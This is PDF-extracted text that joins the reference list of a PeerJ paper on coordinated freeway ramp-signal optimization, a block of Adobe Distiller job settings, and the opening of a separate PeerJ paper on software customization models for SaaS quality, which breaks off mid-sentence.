experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � Wendi Shu conceived and designed the experiments, performed the experiments, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Guojiang Shen performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � Xiangjie Kong performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Data and code are available at GitHub: https://github.com/wendyshu43/SignalOpt. REFERENCES Bakar ZA, Mohemad R, Ahmad A, Deris MM. 2006. A comparative study for outlier detection techniques in data mining. In: IEEE Conference on Cybernetics and Intelligent Systems. Piscataway: IEEE, 1–6. Berkhin P. 2006. A survey of clustering data mining techniques. In: Kogan J, Nicholas C, Teboulle M, eds. Grouping Multidimensional Data. Heidelberg: Springer, 25–71. Berndt DJ, Clifford J. 1994. Using dynamic time warping to find patterns in time series. In: KDD Workshop. 359–370. Chang TH, Li ZY. 2002. Optimization of mainline traffic via an adaptive co-ordinated ramp-metering control model with dynamic OD estimation. Transportation Research Part C: Emerging Technologies 10(2):99–120 DOI 10.1016/S0968-090X(01)00006-7. Chen J, Lin L, Jiang R. 2017. Assigning on-ramp flows to maximize capacity of highway with two on-ramps and one off-ramp in between. Physica A: Statistical Mechanics and its Applications 465:347–357 DOI 10.1016/j.physa.2016.08.053. Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 21/24 https://github.com/wendyshu43/SignalOpt http://dx.doi.org/10.1016/S0968-090X(01)00006-7 http://dx.doi.org/10.1016/j.physa.2016.08.053 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ Chen J, Lin W, Yang Z, Li J, Cheng P. 2019a. Adaptive ramp metering control for Urban freeway using large-scale data. IEEE Transactions on Vehicular Technology 68(10):9507–9518 DOI 10.1109/TVT.2019.2937880. Chen Y, Liu F, Bai Q, Tao C, Qi X. 2019b. Coordinated ramp metering based on real-time OD information. IEEE Access 7:79233–79243 DOI 10.1109/ACCESS.2019.2923438. Cho K, Van Merriënboer B, Gulcehre C, Bahdanau D, Bougares F, Schwenk H, Bengio Y. 2014. Learning phrase representations using RNN encoder-decoder for statistical machine translation. In: Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP). 1724–1734. Dabiri A, Kulcsar B. 2017. Distributed ramp metering—a constrained discharge flow maximization approach. IEEE Transactions on Intelligent Transportation Systems 18(9):2525–2538 DOI 10.1109/TITS.2017.2673782. Erdmann J. 2015. SUMO’s lane-changing model. In: Behrisch M, Weber M, eds. Modeling Mobility with Open Data—Lecture Notes in Mobility. Cham: Springer, 105–123. Feng Y, Yu S, Zhang K, Li X, Ning Z. 2019. COMICS: a community property-based triangle motif clustering scheme. PeerJ Computer Science 5(5):e180 DOI 10.7717/peerj-cs.180. Frejo JRD, Camacho EF. 2012. Global versus local MPC algorithms in freeway traffic control with ramp metering and variable speed limits. IEEE Transactions on Intelligent Transportation Systems 13(4):1556–1565 DOI 10.1109/TITS.2012.2195493. Fu R, Zhang Z, Li L. 2016. Using LSTM and GRU neural network methods for traffic flow prediction. In: Proceedings of Youth Academic Annual Conference of Chinese Association of Automation. 324–328. Han X, Shen G, Yang X, Kong X. 2020. Congestion recognition for hybrid Urban road systems via digraph convolutional network. Transportation Research Part C: Emerging Technologies 121(5):102877 DOI 10.1016/j.trc.2020.102877. He L, Agard B, Trépanier M. 2020. A classification of public transit users with smart card data based on time series distance metrics and a hierarchical clustering method. Transportmetrica A: Transport Science 16(1):56–75 DOI 10.1080/23249935.2018.1479722. Hegyi A, De Schutter B, Hellendoorn J. 2005. Optimal coordination of variable speed limits to suppress shock waves. IEEE Transactions on Intelligent Transportation Systems 6(1):102–112 DOI 10.1109/TITS.2004.842408. Kong X, Tong S, Gao H, Shen G, Wang K, Collotta M, You I, Das S. 2020. Mobile edge cooperation optimization for wearable internet of things: a network representation-based framework. IEEE Transactions on Industrial Informatics 99:1 DOI 10.1109/TII.2020.3016037. Kong X, Wang K, Wang S, Wang X, Jiang X, Guo Y, Shen G, Chen X, Ni Q. 2021. Real-time mask identification for COVID-19: an edge computing-based deep learning framework. IEEE Internet of Things Journal 99:1 DOI 10.1109/JIOT.2021.3051844. Kontorinaki M, Karafyllis I, Papageorgiou M. 2019. Local and coordinated ramp metering within the unifying framework of an adaptive control scheme. Transportation Research Part A: Policy and Practice 128(4):89–113 DOI 10.1016/j.tra.2019.07.009. Krajzewicz D, Erdmann J, Behrisch M, Bieker L. 2012. Recent development and applications of SUMO—simulation of Urban mobility. International Journal on Advances in Systems and Measurements 5(3&4):128–138. Kumar K, Parida M, Katiyar V. 2013. Short term traffic flow prediction for a non Urban highway using artificial neural network. Procedia—Social and Behavioral Sciences 104(2):755–764 DOI 10.1016/j.sbspro.2013.11.170. Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 22/24 http://dx.doi.org/10.1109/TVT.2019.2937880 http://dx.doi.org/10.1109/ACCESS.2019.2923438 http://dx.doi.org/10.1109/TITS.2017.2673782 http://dx.doi.org/10.7717/peerj-cs.180 http://dx.doi.org/10.1109/TITS.2012.2195493 http://dx.doi.org/10.1016/j.trc.2020.102877 http://dx.doi.org/10.1080/23249935.2018.1479722 http://dx.doi.org/10.1109/TITS.2004.842408 http://dx.doi.org/10.1109/TII.2020.3016037 http://dx.doi.org/10.1109/JIOT.2021.3051844 http://dx.doi.org/10.1016/j.tra.2019.07.009 http://dx.doi.org/10.1016/j.sbspro.2013.11.170 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ Li Z, Zhao Y, Liu R, Pei D. 2018. Robust and rapid clustering of KPIs for large-scale anomaly detection. In: IEEE/ACM International Symposium on Quality of Service. Piscataway: IEEE, 1–10. Liao TW. 2005. Clustering of time series data—a survey. Pattern recognition 38(11):18571874. Lipp LE, Corcoran LJ, Hickman GA. 1991. Benefits of central computer control for Denver ramp-metering system. Transportation Research Record 1320:3–6. Liu Q, Wang B, Zhu Y. 2018. Short-term traffic speed forecasting based on attention convolutional neural network for arterials. Computer-Aided Civil and Infrastructure Engineering 33(11):999–1016 DOI 10.1111/mice.12417. Lopez PA, Behrisch M, Bieker-Walz L, Erdmann J, Flötteröd YP, Hilbrich R, WieBner E. 2018. Microscopic traffic simulation using SUMO. In: IEEE Intelligent Transportation Systems Conference. Piscataway: IEEE, 2575–2582. Lv Y, Duan Y, Kang W, Li Z, Wang F-Y. 2014. Traffic flow prediction with big data: a deep learning approach. IEEE Transactions on Intelligent Transportation Systems 16(2):865–873. Meng Q, Khoo HL. 2010. A Pareto-optimization approach for a fair ramp metering. Transportation Research Part C: Emerging Technologies 18(4):489–506 DOI 10.1016/j.trc.2009.10.001. Meshkat A, Zhi M, Vrancken JLM, Verbraeck A, Yuan YF, Wang YB. 2015. Coordinated ramp metering with priorities. IET Intelligent Transport Systems 9(6):639–645 DOI 10.1049/iet-its.2014.0207. Niittymäki J, Pursula M. 1997. Saturation flows at signal-group-controlled traffic signals. Transportation Research Record: Journal of the Transportation Research Board 1572(1):24–32 DOI 10.3141/1572-04. Paesani G, Kerr J, Perovich P, Khosravi FE. 1997. System wide adaptive ramp metering (SWARM) merging the transportation and communications revolutions. Washington, D.C.: Abstracts for ITS America Seventh Annual Meeting and Exposition. Papageorgiou M, Kotsialos A. 2002. Freeway ramp metering: an overview. IEEE Transactions on Intelligent Transportation Systems 3(4):271–281 DOI 10.1109/TITS.2002.806803. Papamichail I, Kotsialos A, Margonis I, Papageorgiou M. 2010a. Coordinated ramp metering for freeway networks—a model-predictive hierarchical control approach. Transportation Research Part C: Emerging Technologies 18(3):311–331 DOI 10.1016/j.trc.2008.11.002. Papamichail I, Papageorgiou M, Vong V, Gaffney J. 2010b. Heuristic ramp-metering coordination strategy implemented at monash freeway, Australia. Transportation Research Record: Journal of the Transportation Research Board 2178(1):10–20 DOI 10.3141/2178-02. Paparrizos J, Gravano L. 2015. k-shape: efficient and accurate clustering of time series. In: Proceedings of the 2015 ACM SIGMOD International Conference on Management of Data. New York: ACM, 1855–1870. Schmitt M, Ramesh C, Lygeros J. 2017. Sufficient optimality conditions for distributed, non-predictive ramp metering in the monotonic cell transmission model. Transportation Research Part B: Methodological 105(1):401–422 DOI 10.1016/j.trb.2017.10.001. Shen G, Zhao Z, Kong X. 2021. GCN2CDD: a commercial district discovery framework via embedding space clustering on graph convolution networks. In: IEEE Transactions on Industrial Informatics. Piscataway: IEEE. Su Y, Zhao Y, Xia W, Liu R, Bu J, Zhu J, Wang Z. 2019. CoFlux: robustly correlating KPIs by fluctuations for service troubleshooting. In: Proceedings of the International Symposium on Quality of Service. 1–10. Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 23/24 http://dx.doi.org/10.1111/mice.12417 http://dx.doi.org/10.1016/j.trc.2009.10.001 http://dx.doi.org/10.1049/iet-its.2014.0207 http://dx.doi.org/10.3141/1572-04 http://dx.doi.org/10.1109/TITS.2002.806803 http://dx.doi.org/10.1016/j.trc.2008.11.002 http://dx.doi.org/10.3141/2178-02 http://dx.doi.org/10.1016/j.trb.2017.10.001 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ Treiber M, Hennecke A, Helbing D. 2000. Congested traffic states in empirical observations and microscopic simulations. Physical review E 62(2):1805–1824 DOI 10.1103/PhysRevE.62.1805. Uras N, Marchesi L, Marchesi M, Tonelli R. 2020. Forecasting bitcoin closing price series using linear regression and neural networks models. PeerJ Computer Science 6(4):e279 DOI 10.7717/peerj-cs.279. Van de Weg GS, Hegyi A, Hoogendoorn SP, De Schutter B. 2019. Efficient freeway MPC by parameterization of ALINEA and a speed-limited area. IEEE Transactions on Intelligent Transportation Systems 20(1):16–29 DOI 10.1109/TITS.2018.2790167. Williams B, Hoel L. 2003. Modeling and forecasting vehicular traffic flow as a seasonal ARIMA process: Theoretical basis and empirical results. Journal of Transportation Engineering 129(6):664–672 DOI 10.1061/(ASCE)0733-947X(2003)129:6(664). Yu DJ, Liu CF, Wu YY, Liao S, Anwar T, Li WQ, Zhou CB. 2019. Forecasting short-term traffic speed based on multiple attributes of adjacent roads. Knowledge-Based Systems 163(1676):472–484 DOI 10.1016/j.knosys.2018.09.003. Zhang G, Wang Y. 2013. Optimizing coordinated ramp metering: a preemptive hierarchical control approach. Computer-Aided Civil and Infrastructure Engineering 28(1):22–37 DOI 10.1111/j.1467-8667.2012.00764.x. Zhang H, Wang X, Cao J, Tang M, Guo Y. 2018. A hybrid short-term traffic flow forecasting model based on time series multifractal characteristics. Applied Intelligence 48(8):2429–2440 DOI 10.1007/s10489-017-1095-9. Zhang C, Wang J, Lai J, Yang X, Su Y, Dong Z. 2019. Extracting origin-destination with vehicle trajectory data and applying to coordinated ramp metering. Journal of Advanced Transportation 2019(1634):1–15 DOI 10.1155/2019/8469316. Zheng H, Lin F, Feng X, Chen Y. 2020. A hybrid deep learning model with attention-based conv-LSTM networks for short-term traffic flow prediction. In: IEEE Transactions on Intelligent Transportation Systems. Piscataway: IEEE, 1–11. Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 24/24 http://dx.doi.org/10.1103/PhysRevE.62.1805 http://dx.doi.org/10.7717/peerj-cs.279 http://dx.doi.org/10.1109/TITS.2018.2790167 http://dx.doi.org/10.1061/(ASCE)0733-947X(2003)129:6(664) http://dx.doi.org/10.1016/j.knosys.2018.09.003 http://dx.doi.org/10.1111/j.1467-8667.2012.00764.x http://dx.doi.org/10.1007/s10489-017-1095-9 http://dx.doi.org/10.1155/2019/8469316 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.446 Coordinated ramp signal optimization framework based on time series flux-correlation analysis Introduction Literature review Framework design Experiment Results Conclusions References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_nfqwywp3onayzkcizcm2w6ysqi ---- Submitted 12 March 2020 Accepted 11 August 2020 Published 21 September 2020 Corresponding author Abdulrazzaq Qasem Ali, abdulraz- zaq.alyhari@gmail.com Academic editor Stefan Wagner Additional Information and Declarations can be found on page 25 DOI 10.7717/peerj-cs.294 Copyright 2020 Ali et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Development of a valid and reliable software customization model for SaaS quality through iterative method: perspectives from academia Abdulrazzaq Qasem Ali, Abu Bakar Md Sultan, Abdul Azim Abd Ghani and Hazura Zulzalil Department of Software Engineering and Information System, Faculty of Computer Science and Information Technology, Universiti Putra Malaysia, Serdang, Selangor, Malaysia ABSTRACT Despite the benefits of standardization, the customization of Software as a Service (SaaS) application is also essential because of the many unique requirements of customers. This study, therefore, focuses on the development of a valid and reliable software customization model for SaaS quality that consists of (1) generic software customization types and a list of common practices for each customization type in the SaaS multi-tenant context, and (2) key quality attributes of SaaS applications associated with customization. The study was divided into three phases: the conceptualization of the model, analysis of its validity using SaaS academic-derived expertise, and evaluation of its reliability by submitting it to an internal consistency reliability test conducted by software-engineer researchers. The model was initially devised based on six customization approaches, 46 customization practices, and 13 quality attributes in the SaaS multi-tenant context. Subsequently, its content was validated over two rounds of testing after which one approach and 14 practices were removed and 20 practices were reformulated. The internal consistency reliability study was thereafter conducted by 34 software engineer researchers. All constructs of the content-validated model were found to be reliable in this study. The final version of the model consists of 6 constructs and 44 items. These six constructs and their associated items are as follows: (1) Configuration (eight items), (2) Composition (four items), (3) Extension (six items), 4) Integration (eight items), (5) Modification (five items), and (6) SaaS quality (13 items). The results of the study may contribute to enhancing the capability of empirically analyzing the impact of software customization on SaaS quality by benefiting from all resultant constructs and items. Subjects Distributed and Parallel Computing, Emerging Technologies, Software Engineering Keywords Customization approaches, Content validity, Iterative method, Model development, Reliability study, SaaS quality, Software as a service INTRODUCTION Software maintenance comprises a significant portion (70%) of the total software implementation costs (Lee, Park & Lim, 2013). According to Yang, Yoo & Jahng (2010), ‘‘more than 75% of the IT budget is spent just maintaining and running existing systems and software infrastructure". The increase in development and operating costs, which How to cite this article Ali AQ, Md Sultan AB, Abd Ghani AA, Zulzalil H. 2020. Development of a valid and reliable software customiza- tion model for SaaS quality through iterative method: perspectives from academia. PeerJ Comput. Sci. 6:e294 http://doi.org/10.7717/peerj- cs.294 https://peerj.com/computer-science mailto:abdulrazzaq.alyhari@gmail.com mailto:abdulrazzaq.alyhari@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.294 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.294 http://doi.org/10.7717/peerj-cs.294 was also one of the main reasons for the failure of application service provider (ASP) in the 1990s (De Miranda, 2010), is inevitable. As a result, the demand for a software as a service (SaaS) model is increasing because the costs of hardware, technology, maintenance, and tenant management are lower (Walraven, 2014; Walraven et al., 2014; Shen et al., 2011; Ali et al., 2017). Some problems, such as customization complexities (Walraven, 2014; Walraven et al., 2014; Guo et al., 2011; Al-Shardan & Ziani, 2015; Walraven, Truyen & Joosen, 2011), for the implementation of SaaS applications remain. Customization is an essential requirement for providing the same application to different users (Walraven, 2014; Ali et al., 2018b), as they may have different business flow, interfaces, and data (Tsai, Zhong & Chen, 2016). Consequently for the hosts of SaaS applications, this requirement will pose quality challenges and risks (Al-Shardan & Ziani, 2015; Rolia et al., 2008). All SaaS application components are influenced by user-specific customization, including both functional and non-functional aspects of all layers of SaaS architecture (Tsai, Shao & Li, 2010). Another complication is having to span multiple layers of SaaS architecture (Al- Shardan & Ziani, 2015). All SaaS application elements, including those with cross-layer relationships, must be customizable. Moreover, customization includes adjustments to the softwares source code that becomes highly complex in the SaaS model (Walraven, 2014; Walraven et al., 2014; Guo et al., 2011; Sun et al., 2008). Changes in the requirements often occur after applications and services have been developed; therefore, runtime customization must be provided within the same software instance for different users (Walraven, 2014; Walraven et al., 2014; Ali et al., 2018a; Van Landuyt, Walraven & Joosen, 2015), and should not impact their privacy and the applications availability (Walraven, 2014; Van Landuyt, Walraven & Joosen, 2015). Generally, SaaS applications lack the customizability of on-premises applications (Yang, Yoo & Jahng, 2010), which would result in reduced software maintenance (Samir & Darwish, 2016; Xin & Levina, 2008). By contrast, frequent customization of the SaaS application would require a burdensome maintenance process and pose a significant challenge to scalability and cost-efficiency (Walraven et al., 2014; Van Landuyt, Walraven & Joosen, 2015). Therefore, application vendors should be cautious about their technical capacity when making 